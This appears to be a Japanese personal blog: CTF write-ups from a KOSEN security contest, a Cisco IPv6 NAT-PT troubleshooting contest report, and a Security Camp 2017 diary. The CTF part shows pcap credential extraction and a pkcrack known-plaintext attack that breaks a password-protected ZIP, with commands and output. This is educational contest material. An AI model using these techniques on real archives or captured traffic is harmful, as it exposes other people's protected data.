チームメンバーが解いたときリトルエンディアンうんぬん言っていたので、頑張ってリトルエンディアンにしてファイルに出力してみる。

>>> b = base64.b64decode(("".join(input.split('\n'))))
>>> packed = "".join([pack("<L",int("0x"+b[i:i+8], 16)) for i in range(0, len(b), 8)])
>>> "".join([pack("<L",int("0x"+b[i:i+8], 16)) for i in range(0, len(b), 8)])
'\x03\x04PK\x08\x08\x14\x00V,\x08\x00\x00\x00SK\x00\x00\x00\x00...'
>>> f = open("out", "wb")

出力したものをfileコマンドで調査。

$ file out
out: data

なんかうまくいっていない。。
また冷静になって考えてみると、先頭4バイトが\x03\x04PKとなっていて、なんかみたことあるなあ、、とggると、ZIPファイルのシグネチャ0x504B0304(PK\003\004)となっていた。
なるほど。ということで、2バイトでリトルエンディアン取り直すことに。

>>> "".join([pack("<H",int("0x"+b[i:i+4], 16)) for i in range(0, len(b), 4)])
'PK\x03\x04\x14\x00\x08\x08\x08\x00V,SK\x00\x00\x00\x00...'

お、今度はちゃんとZIPファイルと同じシグネチャになった。ということで、ファイルとして出力してみる。

>>> packed = "".join([pack("<H",int("0x"+b[i:i+4], 16)) for i in range(0, len(b), 4)])
>>> f = open("out", "wb")
>>> f.write(packed)

出力したファイルを調査すると、Microsoft社のWordファイルだということが分かるので開いてみる。

$ file out 
out: Microsoft Word 2007+
$ mv out.doc out.docx
$ open out.docx

f:id:ush1ken:20171022183858p:plain Flag: SCKOSEN{TEXT_BUT_NOT_PLAIN}

06 _ 解凍して解答せよ _ 100

ファイルからフラグを読み取れ!

flag.zipというファイルが渡されるので、解凍すると、flagというディレクトリの中にpngが2つ展開される。

$ unzip tmp.zip 
Archive:  tmp.zip
   creating: flag/
  inflating: flag/masks.png          
  inflating: flag/xor.png 

開いてみると、次のような画像が表示される。 f:id:ush1ken:20171022184929p:plain 画像をみると、xorしたらなんか得られそうだし、画像のファイル名もmasksとxorだし、ということで画像のxorをとってみる。

import cv2
masks = cv2.imread('./flag/masks.png')
xor = cv2.imread('./flag/xor.png')
flag = cv2.bitwise_xor(masks, xor)
cv2.imwrite('flag.png', flag)

f:id:ush1ken:20171022192038p:plain Flag: SCKOSEN{simple_visual_cryptography}

07 _ 簡単な符号化 _ 100

U0NLT1NFTntiYXNlNjRfaXNfdmVyeV9lYXN5fQ

base64デコードするだけ。

$ echo "U0NLT1NFTntiYXNlNjRfaXNfdmVyeV9lYXN5fQ" | base64 -D
SCKOSEN{base64_is_very_easy

Flag: SCKOSEN{base64_is_very_easy}

Network

15 _ 寝坊気味のコンピュータ _ 100

ここにある通信をキャプチャしたファイルがある。この中から、フラグを見つけ出せ!

problem.pcapngというファイルが渡されるのでとりあえずstringsコマンド...

$ strings problem.pcapng 
Linux 4.10.0-37-generic
Dumpcap (Wireshark) 2.2.6 (Git Rev Unknown from unknown)
wlp4s0
Linux 4.10.0-37-generic
SCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSESCKOSE
N{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wakeN{wake
_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la_on_la
n_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_an_is_a
1~_z
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}
lerm}

フラグっぽいのがみえるので手動で抽出。
ちなみに、Wake-on-LANパケットは、起動したいマシンのMACアドレスを16回繰り返したデータを含むそうです。
この問題では、フラグが6文字ずつMACアドレスとしてWoLパケットに埋め込まれているという問題でした。
Flag: SCKOSEN{wake_on_lan_is_alerm}

16 _ ログインしたいんだ! _ 100

ここにある通信をキャプチャしたファイルがある。この中から、フラグを見つけ出せ!

これもまたproblem.pcapngというファイルが渡されるのでまた何も考えずstringsコマンド...

$ strings problem.pcapng
...
GET / HTTP/1.1
Host: 172.27.132.124
Connection: keep-alive
Authorization: Basic YWRtaW46U0NLT1NFTntiYXNpY19pc191bnNlY3VyZX0=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.102 Safari/537.36 Vivaldi/1.94.971.8
...

ざーっと眺めるとしたのほうにbase64っぽい文字列を発見。 よく見るとBasic認証をしているので、base64デコードしてみる。

$ echo "YWRtaW46U0NLT1NFTntiYXNpY19pc191bnNlY3VyZX0=" | base64 -D
admin:SCKOSEN{basic_is_unsecure}

Flag: SCKOSEN{basic_is_unsecure}

別解

f:id:ush1ken:20171022231009p:plain たぶんこっちが正攻法。
WireSharkなどのパケットキャプチャツールでproblem.pcapngを開くと、401 Unauthorizedで認証に何度も失敗しているHTTP通信が見られるので、認証に成功している(200 OKな)パケットを探す。
48パケット目に200 OKなパケットがあり、その直前のGET / HTTP/1.1なパケットを見ると、Basic認証の情報があるので、パスワードがフラグになっている。 f:id:ush1ken:20171022232423p:plain Flag: SCKOSEN{basic_is_unsecure}

17 _ ファイル送信 _ 200

これはファイルを送受信しているpcapです

file.pcapというファイルが与えられるので、とりあえずstrings...してもあまり嬉しい情報は見つからなかった。
素直にWireSharkで開くと、Lenna.pngと、lock.zipがHTTP通信で送受信されているのがわかる。
ということで、WireSharkFile -> Export Objects -> HTTP -> Save Allでファイルをエクスポート。

それぞれのfileコマンドの結果を見てみる。

$ file Lenna.png lock.zip 
Lenna.png: PNG image data, 512 x 512, 8-bit/color RGB, non-interlaced
lock.zip:  Zip archive data, at least v2.0 to extract

普通のファイルっぽいので、普通にunzipしてみる。

$ unzip lock.zip 
Archive:  lock.zip
[lock.zip] Lenna.png password: 
password incorrect--reenter: 
password incorrect--reenter: 
   skipping: Lenna.png               incorrect password
[lock.zip] flag.txt password: 
password incorrect--reenter: 
password incorrect--reenter: 
   skipping: flag.txt                incorrect password

普通にパスワードがかかっててunzipできない。
ここでみんなで数時間悩んだ。
「Lenna.pngにパスワードが隠されているのでは?」「TCPパケットにパスワードが隠されているのでは?」「BruteForceでパスワードクラックするのでは?」
結論からいえば、既知平文攻撃でした。
1日目終了後、おうちに帰って冷静になってctf zip パスワードとかでwriteupを適当にggっていたら、あ。これだ。

SECCON 2015 Online CTF Writeup

ということで、pkcrackをインストールし、早速実行。

$ zip Lenna.zip Lenna.png
$ pkcrack -C lock.zip -c Lenna.png -P Lenna.zip -p Lenna.png -d flag.zip
...
Done. Left with 90 possible Values. bestOffset is 298362.
Stage 1 completed. Starting stage 2 on Sun Oct 22 23:51:16 2017
Ta-daaaaa! key0=e15a792b, key1=591e8679, key2=9dee3dba
Probabilistic test succeeded for 175560 bytes.
Ta-daaaaa! key0=e15a792b, key1=591e8679, key2=9dee3dba
Probabilistic test succeeded for 175560 bytes.
Stage 2 completed. Starting zipdecrypt on Sun Oct 22 23:51:19 2017
Decrypting Lenna.png (155edefb6ebeec35536b5a3d)... OK!
Decrypting flag.txt (f38434531be49de337a96b0e)... OK!
$ cat flag.txt
SCKOSEN{k_p_t_a}

Flag: SCKOSEN{k_p_t_a}

おわりに

今回のKOSENセキュコンでは、圧倒的知識不足を感じました(毎回感じてる気がする)。
というのも、解きたい問題のメインテーマについてそこそこ知識が無いと解けない問題というものにどんどん直面してきてるように感じるので、もっと広く深く勉強したいです。
解けなかった問題についても、プロ各位のwriteupを見て勉強したいです。。

楽しい大会をありがとうございました!

ICTSC8に参加したおはなし

はじめに

今回は、ICTトラブルシューティングコンテスト第8回(以下、ICTSC8)に参加してきた(記事を書いてる今は真っ最中)ので、備忘録、そして戒めの記録としてこの記事を書きます。

ICTSC8にはEagleJumpというチーム名で参加させていただきました。

ちなみに、こういうWrite-Up的なものを書くのは初めてなので、ログなどの取り忘れが多いです。。

1日目

1日目終了時点では500点で8位/15位でした。
ちなみに1位のチームは1960点、2位920点、3位890点って感じでした。
1位圧倒的ですね。。2位3位もぉっょぃ。。

ちなみに1日目は1問も解けませんでした。。
チームメンバーにめちゃくちゃ自虐キツイって言われたんですが、自戒の念も含め、ですね。

伝統の国 第二のトラブル (ipv6環境構築)

1日目に解こうとした問題を2日目には完全に解けるように、ipv6の基礎を理解するためにおうちに帰って簡単に、思い出せる限りで同じ環境を構築してみました。

構成

時間が無かったので(帰宅22時スタート)、端末はMacBook Pro(MacOS Sierra)とRaspberryPi3(CentOS 7, 問題ではUbuntu)を使用して、ルーターは実機で892j(問題では1941?)を使用しました。
パケトレでもいいかなって思ったのですが、時間もなかったので(重要)、なんか途中までやって機能制限されてたら嫌だなって思って実機にしました。

問題は892jから1941にconfigそのまんま移植しちゃったてへぺろな的な感じだったので、完全には再現できていませんが、ipv6とNAT-PTの勉強も兼ねて、前日(当日)夜の悪あがきです。

ネットワーク図は以下のとおりです(ipv6のネットワーク図の書き方わからない)。。 f:id:ush1ken:20170830213546p:plain

fa0 設定

まず892jにRaspberryPi3(以下、rpi)に繋いでいるインターフェイスの設定を行いました。(ちょろいちょろい)

2分後…

Router(config-if)#ip address 192.168.140.2 255.255.255.0
% IP addresses may not be configured on L2 links FastEthernet0.

インターフェイスIPアドレスが割り振れない。。
どうやら892jでは(?)、LANポートはL2スイッチなので直では割り振れないよう。。

jianlan.hatenablog.com

ということで、VLAN。

Router(config)#vlan 10
Router(config-vlan)#exit
Router(config)#int vlan 10
Router(config-if)#
*Aug 26 14:12:14.083: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan10, changed state to down
Router(config-if)#ip address 192.168.140.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#int fa0 
Router(config-if)#switchport access vlan 10
Router(config-if)#end

Vlan10の設定と、インタフェースへの割当が出来たので、つぎは疎通確認。

Router#ping 192.168.140.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.140.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms

できた。

gi0 設定

次はMacBookPro(macだとmacアドレスと分かりづらいので以下、mbp)に繋いでいるインターフェイスの設定を行いました。

Router(config)#ipv6 unicast-routing
Router(config)#int gi0
Router(config-if)#ipv6 address 2001:DB8:3002::9/64
Router(config-if)#no shutdown
Router(config-if)#end

これでmbp側のインターフェイスの設定が終わりましたので、あとは疎通確認。

Router#ping ipv6 <mbp ipv6 address>
Output Interface: GigabitEthernet0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to FE80::82C:2547:BBA2:48FA, timeout is 2 seconds:
Packet sent with a source address of <mbp ipv6 address>%GigabitEthernet0
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 0/0/0 ms

できた。
gi0の場合はVLAN振らなくていいらしい。

NAT-PT 設定?

さあここからが勝負。
以下のサイトを参考にNAT-PTの設定を行っていきます。
changineer.info

まずはipv6 natのプレフィクスの設定と、vlan10とgi0のnatの設定。

Router(config)#ipv6 nat prefix 2017::/96
Router(config)#int vlan 10
Router(config-if)#ipv6 nat
Router(config-if)#exit
Router(config)#int gi0
Router(config-if)#ipv6 nat
Router(config-if)#exit
Router(config)#!ここのexitって要るのだろうか、、

つぎに、v4からv6への変換?とv6からv4への変換?
基本的に問題の(一部だけ)持ち帰ったconfigの通りに写経しただけなので、あんまり意味がわかっていない。。

Router(config)#ipv6 nat v4v6 source 192.168.140.1 2017::192.168.140.1
Router(config)#ipv6 nat v4v6 source 192.168.140.2 2017::192.168.140.2
Router(config)#ipv6 nat v6v4 source list v6-src pool v4-pool overload
Router(config)#ipv6 nat v6v4 pool v4-pool 192.168.130.1 192.168.130.1 prefix-length 24

そして、ipv6のルーティングプロトコルの設定?と、各インタフェースへの割当。
この辺も正直必要なのか必要でないのかよくわかっていない。。
今回、問題のconfigをなぜか一部しか持って返っていなかったのでルーティングプロトコルの設定とか何すれば良いんだろうみたいな感じでした。
そもそもNAT-PTだとルーティングプロトコルとか要らないんでしょうか。。

Router(config)#ipv6 router rip P1
Router(config-rtr)#exit
Router(config)#int fa0
Router(config-if)#exit
Router(config)#ipv6 router rip P1
Router(config-rtr)#exit
Router(config)#int vlan 10
Router(config-if)#ipv6 rip P1 enable
Router(config-if)#exit
Router(config)#int gi0
Router(config-if)#ipv6 rip P1 enable
Router(config-if)#exit

最後になんかaccess-listを作って割当。

Router(config)#ipv6 access-list nat_traffic
Router(config-ipv6-acl)#permit ipv6 any 2017::/96
Router(config-ipv6-acl)#exit
Router(config)#int vlan 10
Router(config-if)#ipv6 nat prefix 2017::/96 v4-mapped nat_traffic
Router(config-ipv6-acl)#exit

これで設定は終わり。。
ping等で疎通確認が出来て安心できたのかこの日は、ろくにログも取らずに午前3時に作業を終えました。

ログが取れた際のVlan10(rpi側インタフェース)と、gi0(mbp側インタフェース)、アクセスリストまわりのコンフィグと、"show ipv6 route connected"コマンドの結果を以下に載せます。

interface GigabitEthernet0
 no ip address
 duplex auto
 speed auto
 ipv6 address 2001:DB8:3002::9/64
 ipv6 nat
!
interface Vlan10
 ip address 192.168.140.1 255.255.255.0
 ipv6 enable
 ipv6 nat prefix 2017::/96 v4-mapped nat_traffic
 ipv6 nat
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
!
logging esm config
ipv6 nat v4v6 source 192.168.140.1 2017::C0A8:8C01
ipv6 nat v4v6 source 192.168.140.2 2017::C0A8:8C02
ipv6 nat v6v4 source list v6-src pool v4-pool overload
ipv6 nat v6v4 pool v4-pool 192.168.140.1 192.168.140.1 prefix-length 24
ipv6 nat prefix 2017::/96
!
ipv6 access-list nat_traffic
 permit ipv6 any 2017::/96
Router#show ipv6 route connected
IPv6 Routing Table - default - 4 entries
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route
       B - BGP, HA - Home Agent, MR - Mobile Router, R - RIP
       D - EIGRP, EX - EIGRP external, ND - Neighbor Discovery
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2
C   2001:DB8:3002::/64 [0/0]
     via GigabitEthernet0, directly connected
C   2017::/96 [0/0]
     via NVI0, directly connected
     via Vlan10, directly connected

2日目

2日目、まあ気持ち悪い。 ねむい。 それでもこの日に1問でも解かなければ人権が無さそうだったので、頑張りました。

結果、前日(当日早朝)にやった問題再現が功を奏したか、伝統の国 第二のトラブルを無事満点(300点)で解くことができました。
ありがとうございました。

伝統の国 第二のトラブル (Write-Up的なもの)

以下、1問だけWrite-Up的なものです。
詳しい解説とかはまた時間があるときにでも、、()

問題

ちょっと見にくいですが、当日のUIも兼ねて、こんな感じでしたというご紹介。

f:id:ush1ken:20170830215457j:plain

初めて見る方は問題文の設定が意味不明すぎると思うのでちょっとうろ覚え解説。

我々、参加者は謎の世界に飛ばされたらしく、謎の世界の謎の国々でトラブルを解決するストーリーらしいです(かなりざっくり)。

問題は、環境構築でもあったとおり、ipv4ipv6の変換をnat-ptで行おうと思ったけど、config移植したらぶっ壊れたみたいなお話でした。

解答

以下に、実際の解答をほぼ原文でペーストします。

お疲れ様です。EagleJumpの***です。 問題14の回答を送らせていただきます。

この問題では、"ipv6 access-list v6-src"の設定ミスが原因で、IPv6からIPv4への変換が出来ず、疎通ができないというトラブルが発生していたと考えられました。

また、"ip cef"および"ipv6 cef"が有効になっていたため、パケットDropが発生していました。

以上のトラブルを解消すべく、以下のように設定を変更し、「1941のgi0/0ポートに繋いだIPv6アドレスのみを持つPCから192.168.140.1にping」が正しく通ることを確認いたしました。 ご確認のほど、よろしくお願いいたします。

v6-srcアクセスリストの編集

1941(config)#ipv6 access-list v6-src
1941(config-ipv6-acl)#no permit ipv6 1::/64 any 
1941(config-ipv6-acl)#permit ipv6 2001:db8:3002::/64 any
"ip cef"および"ipv6 cef"の無効化

1941(config)#no ip cef
1941(config)#no ipv6 cef
以上の修正を行った上で、「1941のgi0/0ポートに繋いだIPv6アドレスのみを持つPCから192.168.140.1にping」が通ったので、その結果を以下に示します。

$ ping6 2017::192.168.140.1
PING6(56=40+8+8 bytes) 2001:db8:3002::442b:59a3:1c29:e83f --> 2017::c0a8:8c01
16 bytes from 2017::c0a8:8c01, icmp_seq=0 hlim=254 time=1.686 ms
16 bytes from 2017::c0a8:8c01, icmp_seq=1 hlim=254 time=1.337 ms
16 bytes from 2017::c0a8:8c01, icmp_seq=2 hlim=254 time=1.580 ms
^C
--- 2017::192.168.140.1 ping6 statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 1.337/1.534/1.686/0.146 ms
解答は以上です。 採点のほど、よろしくお願いいたします。

この問題のキモは、アクセスリストの設定ミスだったようなので、アクセスリストを変更しました。
また、NAT-PT使用環境ではcef(Cisco Express Forwarding)はサポートされていないので、無効化する必要がある、という点が満点に繋がったのかなと思います。

まとめ

最終的なチームとしての結果は1310点?とかで、何位ぐらいなんでしょうね。。
もしこれを見てくださっているICTSC8運営の方いらっしゃいましたら、ランキングの公開ぜひお願いしたいです。。

次回は関西で開催されるのが決定されているそうですが、別のイベントで忙しそうなので出れるかは微妙ですが、日程が合えば予選参加したいです。

次はこのぐらいの問題は1日目の午前の1/2ぐらいでちゃちゃっと解いてみたいものです。。

セキュリティ・キャンプ 2017 のおはなし

はじめに

セキュリティ・キャンプ 2017 (以下、キャンプ)に参加させていただいたのでブログを開設することを決めました。
今回のブログでは、キャンプ中に起きた出来事や思ったこと(講義の内容については割愛)などを書いていこうと思います。
はじめて書くのでつたないブログになるかとは思いますが、優しい目で見ていただけると幸いです。
また、もし公開してはならない情報まで公開していた場合はコメントやTwitter(@o__g_)等にて教えていただけるとありがたいです。

目次

受けた講義

キャンプでは選択講義で以下の講義を受けました。
もし、この講義どうだった?とか、この講義楽しかったよね〜〜、とかってお話をして頂ける場合はコメントやTwitter(@o__g_)等で、連絡いただけると喜びます。

  • A1 PowerShellベースのマルウェアとその防御手法
  • A2 AIのデータ汚染を検知しよう
  • A3 AIのデータ汚染を検知しよう
  • A4 Androidマルウェアなアプリを機械学習で検知しよう!
  • A5 Availability Challenge ~サービスの可用性を確保せよ~
  • E6 インシデントレスポンスで攻撃者を追いかけろ
  • E7 インシデントレスポンスで攻撃者を追いかけろ

DAY1

初日。

この日は集合(受付)が12:00~12:30とのことだったので、途中で名刺入れとかお菓子とか買いながらのんびり向かおうと思っていました。 しかし、知り合いのチューターに早く来たほうがいいと言われたので、諸々を諦め会場に向かうことにしました。

会場に着きいろいろ手続きを済ませ、ホールへ案内されるとすでに8割ぐらい参加者が揃っていて、名刺交換会なるものが始まっていました。 ぼくはもともと人見知りなので、その場では多くの人とは名刺交換をすることができず、キョロキョロあたりを見回しながら、名前順に配置された4人1テーブルのメンバーと少し挨拶をしたりしました。

会場に着いて数分後、まだ12:30にもなっていないのに食事の案内が行われ、まだ来ていない人もいたため、早く来て良かった、、と思いました。 食堂では4人1テーブルという感じで、ホールでのテーブルのメンバーと一緒に食べました。 食事の内容等については、他の方のブログやTwitter“#seccamp”タグを検索すれば得られると思います(あとがき: カレーが結構辛かった)。

食事を終えると、結構時間が余っていたためホールに戻ると、また名刺交換会が始まり、そこでは勇気を出していろんな方と名刺を交換することができました。 名刺を持ってきていないという方も居て、その方は俗に言う「人権を失った」状態だったので、やっぱり持ってきて良かったと思いました。

名刺については、学校で用意していただいたものを持っていったのですが、やはり自分のSNSアカウントやハンドルネーム等が載った名刺も作って持ってきたほうが良かったなあと思いました。 ちゃんとした名刺(会社や学校のもの)とふざけた名刺(個人のSNSや趣味などを書いたもの)といった2種類の名刺を渡してくださった方や、片面に社用、裏面に私用の名刺を刷ってある方もいたので参考にさせていただきたいと思います。

その後は、ぉっょぃ方々によるお話や講義が約4時間弱続きましたが、前日深夜の事前課題ラストスパートに起因する集中もとい意識が朦朧としてしまったことだけをお伝えし、内容については割愛させていただきます。

講義が終わると、また食事の案内があり、食事を終えるとまたホールに戻ってきて、最後のグループワークのセッションに移りました。 グループワークでは、4つのテーマのうち1つのテーマを選んで議論し、最終日に発表するというものでした。 チーム分けは自分のテーブルの4人と隣のテーブルの4人を合わせた計8人でした。 ぼくはチームでリーダーを立候補しましたが、5日間通して大したことをやっていないので、グループワークについても詳細は、この記事では割愛させていただきます。

ここまでで、キャンプDAY1が終わり、それぞれ自室に帰ってゆっくり休みました。 ちなみに部屋の中はこんな感じでした。 なんか脱ぎ捨てられたシャツが写り込んでいますが気にしないでください。 f:id:ush1ken:20170822135321j:plain

DAY2

2日目の朝はとにかくつらかったです。

グループワークのお話を07:30から食堂でしよう!とチームメンバーと決めていたのですが、集まったものの、ほぼ全員が頭働いてなくて、議論のぎの字も無く、次に集まる日程のみを決めてあとは食事に集中することにしました。 それ以降の3日間は言うまでもなく、朝の会議はなくなりました。

食事のあとは08:30からすぐに専門講義が始まるので、それぞれの部屋に向いました。 2日目だけ専門講義(1コマ4時間)が3コマ入っていて、キツかったですが、楽しかったです。

ぼくは、2日目の昼食と夕食のときにIPAによる取材?が入っていたので、食事を急いで食べなければならず結構そこはつらかったです。

そしてこの日の夜は、22:00から疲れた身体にムチを打って()、朝やり損ねたグループワークの続きを行いました。 案の定、進捗はあまり良くなかったです。

その後、部屋に帰って次の日の講義の事前課題の発表資料を作ろうと思っていました。 しかし、某ズにて講師の方から「心配しないでください。寝てください。」とのお告げがありましたので、本能のままに眠りにつきました。 f:id:ush1ken:20170822153712j:plain

2日目に受けた選択講義は以下のとおりです。

  • A1 PowerShellベースのマルウェアとその防御手法
  • A2 AIのデータ汚染を検知しよう
  • A3 AIのデータ汚染を検知しよう

DAY3

3日目の朝もつらかったです。

この日も朝からご飯を食べ(当たり前のことですが当たり前ではない)、08:30から講義を受けるというスケジュールでした。 しかし、講義は楽しいので、そこまでストレスではありませんでしたが、やはり眠いものは眠いですね。

最初の講義では、前日に詰めようと思っていた出来かけの発表資料で発表したのですが、その講義の参加者の半分?ぐらいしか発表資料出来ていないって感じでびっくりしました。

最初の講義が終わって昼食を食べていたのですが、あまりにも眠すぎて、早く食べてお昼寝しようと思いましたが、微妙に時間が足らず断念しました。

夕食では、参加者、チューター、講師、その他という分類で、決められた座席に座り、講師の方やチューター、参加者との交流を行いました。

この日は、朝食、講義、昼食、講義、夕食と、ここまでは2日目と同じだったのですが、夕食のあとにBoF(85分)と企業プレゼンテーション(30分)、最後にグループワーク(80分)、と盛りだくさんな1日でした。

全てのセッションが22:00に終わって、それ以降は部屋に戻ってゆっくりTwitterを見る時間にしました。 すると、Twitterにて、4日目に受ける講義(E6,7)の事前課題一緒にやろう!というお誘いをいただいたので、終わってはいたものの、まだ不十分であると感じていたため、集合場所に向いました。 事前課題の続きは、以下写真の中央右下に小さく見えます、丸テーブルにて行いました。

今更ですが、今年の会場(クロスウェーブ府中)はとても綺麗で、こういった、簡単に話し合いができるような場所もあって、デザインもすごく素敵いい場所だなあと思いました。 f:id:ush1ken:20170822143744j:plain

3日目に受けた選択講義は以下のとおりです。

DAY4

4日目の朝もつらかったです。毎日朝はつらいですね。

この日も、2日目と3日目と同じく、講義2コマを朝昼夕食で挟むようなスケジュールで進んでいきました。

この日は、3日目のお昼に考えていたお昼寝大作戦を決行いたしました。
1コマ目の講義が終わり、すぐに食堂へむかい、1分たりとも時間を無駄にするなと言わんばかりに、食事を素早く済ませ、一緒のテーブルで食べていたキャンプ参加者に行って参ると一言を残し、自室へむかいました。
自室のドアになにかよくわからないヒモがかかっており、掃除のおばちゃんがお昼寝中に来ると嫌だなと思い、合鍵であけられないよう内鍵(U字ロック?)をかけ、閉まっていたはずのカーテンがなぜか開いていたので閉め、念入りにiPhoneでアラームを30分後にセットしました。 そして、眠いはずなのに覚醒している脳をなだめるよう、目をつぶり眠りにつこうとしました。

目をつぶって数分後、だんだん夢にも入ってきたなあというころ、いろんな人の話し声や笑い声の幻聴が大音量で聞こえてきました。
これはまずい、と思った頃にはもう遅く意識がハッキリしたころにはすでに金縛りにかかっていました。。
金縛りが解け、時計を見るとまだ10分しか経っていませんでしたので、また眠りにつき残りの20分で精一杯眠気を飛ばそうと思いました。
結局あとの20分も変な夢ばかり見て、30分間で眠気を覚ますこともなく、逆に疲れるような体験をしてしまいました。
そして疲れた顔で2コマ目の講義に向いました。

この日の夕食は、やけに豪華な感じでした。 しかし、豪華なだけに「なんか今日量少ないね」という声も聞こえてきました。が、ぼくは美味しかったので満足できました。 (食べかけですが、気にしないでください。) f:id:ush1ken:20170822151800j:plain

夕食のあとは、企業プレゼンテーションとグループワークがあり、BoFが無い代わりに21:00に解散となっていました。
しかし、グループワークのあとサプライズがあり、プレゼントがホールの外に並べてあるとのアナウンスがあり、会場がざわつきました。 班ごとに、プレゼントを見て回ると、そこには本やリュック、マイコンボード?などのいろいろなプレゼント(以下ツイート参照)がありました。

ぼくは、OS自作本とNN自作本を選びました。 他にもトラ技Jr.とInterfaceも全員がいただきました。 本当にありがたいです。 今後、この本を読んで、ネタにしたブログを書きたいと思っています。 ありがとうございました。 精一杯還元したいと思います。 f:id:ush1ken:20170822153138j:plain

そして、21:00からグループワークの続きをやろうかとも思いましたが、チームメンバーもみんな疲れているだろうしということで、21:00以降は残業はしませんでした。ホワイトですね。

4日目に受けた選択講義は以下のとおりです。

  • E6 インシデントレスポンスで攻撃者を追いかけろ
  • E7 インシデントレスポンスで攻撃者を追いかけろ

DAY5

最終日です。
「5日目の朝もつらかったです。」という文面を期待していた方もいたかとは思いますが、この日は朝食を犠牲にして睡眠を得ることで、多少のつらみを抑えることに成功しましたことをご報告いたします。
(本当はこの作成を2日目から使いたかったのですが、さすがに講義中にエネルギー切れになるのは避けたいので封印していました。)

集合のギリギリまで寝ていていつもよりほんのすこしだけ眠くないぼくは、急いでホールに向い、最後のグループワークを行いました。 最後のグループワークでは、資料作成を行いました。 みなさんやはりおつかれでしたが、その後なんとか発表資料を提出し、発表を無事(?)終えることが出来ました。。 他のメンバーもそうですが、身体を張って発表してくださったお二方には特に感謝したいと思います。

10班全ての発表を終えると、昼食を食べ、またホールに戻り、専門講義の成果報告のプレゼンを見ました。 専門講義ではこういうことやってたのか、こういう成果があったのかというようなことがわかったので良かったと思います。

そして最後に、ぉっょぃ方々のお言葉で閉会式が終わり、セキュリティキャンプは幕を閉じました。
と思いきや、それでは集合写真を撮りますのでということで1階フロントに集まり、最後に集合写真を取りました。 「圧倒的」「「「成長!!」」」

感想

出来事が長くなってしまったので、感想は簡潔に済ませたいと思います。

キャンプの感想を一言で、まとめるならば「足りない」です。 事前課題を行う事前期間、実際に講義を受ける5日間、そして事後の今日に至るまでを含め、圧倒的に時間が「足らない」と感じています。
なぜかというと、この約2,3ヶ月だけで講師,チューターの持っている知識を完全に得られることはほぼ不可能で、さらに言えば、5日間という短い期間では受ける講義の範疇の知識を全て得るというのは不可能だと思ったからです。

何が言いたいかというと、セキュリティ・キャンプに参加しただけでは、圧倒的成長することは出来ず(中には出来た方もいるかもしれません)、参加した後もモチベーションを継続して、勉強していくことが大事だなと感じました。

また、この5日間ではいろんな分野の知識を広く浅く学ぶことによって、以前に増して今後の学習の方向性が固まって、以前に増してモチベーションを維持することができるようになったと思います。

さらに、参加者、チューター、講師、運営の様々な方と知り合えたこのご縁を無駄にすることなく、今後もイベントに参加する、イベントを主催する、ことなどを通してイキリストの輪(元ネタ:A班グループワーク発表)を広げたいと思います。

セキュリティキャンプに関わってくださった全ての方に感謝して、自分なりにこの恩を少しずつ返していきたいと思います。
ありがとうございました。